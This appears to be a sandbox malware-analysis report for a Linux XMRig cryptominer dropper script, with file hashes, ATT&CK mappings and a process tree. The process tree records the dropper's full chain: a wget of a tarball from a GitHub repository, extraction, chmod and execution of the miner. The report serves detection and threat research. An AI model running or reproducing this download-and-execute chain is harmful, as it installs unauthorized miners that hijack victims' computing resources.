xmrig_linux | 9de0a0410f95d1e8d1594b7df632bfa014987e984338423ce768734862e8e6d5

Analysis

max time kernel
1s
max time network
1678s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
17-10-2024 00:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runok1.sh
Size

142B
MD5

425b91f7139485fbaecc3b28a93b682e
SHA1

e4407d765dd13af57948ea4baa16d81878906313
SHA256

5b1099aa137f2c09e9ab16e245cb15857937b23c04b60f2a3b0f36b176237e3d
SHA512

92280fa2aeef5bf43fc20a273b6d9717f7e2107eb719e6593f99bd1d1d38f3f1f97e2dce8be3c61c8e785be5a8e8292702f73ef602749eabdb808706e200e7bf

Score

10^/10

xmrig_linux defense_evasion discovery miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
/tmp/ok1/ok1/xmrig	family_xmrig
/tmp/ok1/ok1/xmrig	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

1442 chmod
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

5 raw.githubusercontent.com
6 raw.githubusercontent.com
7 raw.githubusercontent.com
Reads runtime system information 1 IoCs
Reads data from /proc virtual filesystem.
discovery

Processes:

tar

description ioc process

File opened for reading /proc/filesystems tar

pid	process
1442	chmod

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

description	ioc	process
File opened for reading	/proc/filesystems	tar

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

Processes:

tarwget

description	ioc	process
File opened for modification	/tmp/ok1/ok1/xmrig	tar
File opened for modification	/tmp/ok1.tar.gz	wget
File opened for modification	/tmp/ok1/ok1/SHA256SUMS	tar
File opened for modification	/tmp/ok1/ok1/config.json	tar

/tmp/runok1.sh
/tmp/runok1.sh
1⤵
PID:1399

/usr/bin/wget
wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/ok1.tar.gz
2⤵
- Writes file to tmp directory
PID:1400

/usr/bin/tar
tar xvf ok1.tar.gz
2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1440

/usr/local/sbin/gzip
gzip -d
3⤵
PID:1441

/usr/local/bin/gzip
gzip -d
3⤵
PID:1441

/usr/sbin/gzip
gzip -d
3⤵
PID:1441

/usr/bin/gzip
gzip -d
3⤵
PID:1441

/usr/bin/chmod
chmod +x xmrig
2⤵
- File and Directory Permissions Modification
PID:1442

/tmp/ok1/xmrig
./xmrig
2⤵
PID:1443

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/.wget-hsts

Filesize
215B

MD5
6da59275d08f119cefb743119ded3060

SHA1
392825f9375f9f54537c79146c5e0ef2fcb7252d

SHA256
f5d9a2edb8c48a935f2a6bbe0d40ba5fca6bd3c7a955a5c62c1adff6b2cd5ae8

SHA512
0c4237f2e7e5adb6cc599e0c2c0b7329a902f6acb6c04444fcbf246b5b3c7ebbe22e42cd5c0c4c98c85c634eb072a51bc483140c5c857b1e69c79fcafe086f77

Download Submit
/tmp/ok1.tar.gz

Filesize
2.9MB

MD5
2b9ff325451f304a48a3fe6599613bef

SHA1
d6fb1d5f1d993b7e26cb80d8021a4708edc152d6

SHA256
748b121b7395204838ad972caef5fe1c45d8336e1220b7260011a1be2ce21c89

SHA512
906f828f757d05ea9aa8d7acf56fa81a0026ed81b8b763efd89fda73e01ba3b9ee964a10499321a12310d3ec7513d64cc8fb80a2d0906ce3c24ceff7737712d8

Download Submit
/tmp/ok1/ok1/SHA256SUMS

Filesize
150B

MD5
7fd26dcea92a3ad3561867c5735c8ecc

SHA1
400fe1a03ef6d4520b88f0c63002266586cdaa0f

SHA256
c2db0386506ea30d3b7c375ff40dfc875c2aa7961beb7806a36cf12fc10405b6

SHA512
b114cee7f7da66afc53aca2013c63ed0d12740cca8ad46a5164789fe33f1889a2ec313186a29c4fc1dd30a11041db31bb307be1884e15680f4b7627143cbf6d8

Download Submit
/tmp/ok1/ok1/config.json

Filesize
2KB

MD5
6b2a368c8fb65afcfdedf3790de06cec

SHA1
57725848151f6a3ff894d262cff6773a343b33a6

SHA256
64dda0b03564d8812657259c7df506e95ef6fb73afb3f69662c5a4f978d99156

SHA512
b4e30d3f926acbddbf4f12a6835dee0ec82c249d8ceea25848bc1fa087d4a9541864adb8ea665b3b63c8cc27dc49ab9df6629640026105616c94cf0d689f7c10

Download Submit
/tmp/ok1/ok1/xmrig

Filesize
6.7MB

MD5
8f633ade35df4f992eb28a2c5bc37cef

SHA1
6b2fe529339896b22328dec8936219e7b8e3252f

SHA256
364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c

SHA512
8073ded4e0b5d6333ecb0b324cf09c023dfa99c6110ad6f86225f1a4b9a0dcdf88bd094da9c920a8b729c020990dba9f263481030dec463ab9fbc41cba050c73

Download Submit